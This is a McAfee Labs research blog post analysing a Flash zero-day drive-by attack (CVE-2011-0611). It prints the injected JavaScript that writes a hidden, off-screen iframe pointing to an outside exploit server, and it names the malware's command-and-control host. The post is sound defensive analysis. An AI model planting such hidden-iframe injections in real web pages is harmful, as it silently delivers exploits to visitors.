Chintan Shah is a security research lead with McAfee Labs, focused on several areas of advanced threat research, ...
Adobe released a security advisory warning the users of a zero-day vulnerability in Adobe Flash Player Versions 10.2.152.33 and earlier. An exploit targeting this vulnerability was embedded inside Microsoft Excel documents and was used to deliver the malicious code to the victims. McAfee Labs performed a detailed technical analysis of the exploit and learned that the Flash Player object embedded inside the Excel document carried the malicious shellcode (shown below), which in turn loaded another Flash object to exploit the vulnerability via the classical heap-spray technique.
A couple of weeks ago we came across another variation in this attack via a drive-by download through a compromised web server.
A drive-by download usually goes like this:
.var e=new Date();e.setDate(e.getDate()+1);e.setHours(0,0,0);e.setTime(e.getTime());
..document.write(“<iframe frameborder=0 style=’position: absolute; top:-9999px;left:-9999px’ src=’http://22.214.171.124/dir/AI/exploit.html‘
width=468 height=60 scrolling=no></iframe>“);
The browser then connects to this URL and downloads the exploit.html page.
This page was still alive during our investigation. Its contents looked like this:
The browser makes this request to download newsvine.jp2.
Another GET request downloads the Flash object:
Next we see the Flash ActionScript that we decompiled from the Flash object. The highlighted part within the code is another embedded Flash object containing the exploit code.
While analyzing newsvine.jp2, we suspected this binary could have been authored in China due to the fact that resource section of this file has the locale ID of 2052, which maps to China.
The version information of swf.exe contains the string zchuang, which could be the author’s name.
Once executed the malware attempts to connect to the control server jeentern.dyndns.org on port 80.
McAfee Intrusion Prevention (formerly IntruShield) has released coverage for the Adobe Flash zero-day download Trojan under the attack signature 0x402a1700-HTTP: Adobe Flash Drive By Download Trojan. McAfee customers with up-to-date installations are protected against this malware.
——– UPDATE ———–
To clarify – this exploits CVE-2011-0611 and NOT a new 0-day or new vulnerability. Sorry if the earlier lack of specificity caused any confusion!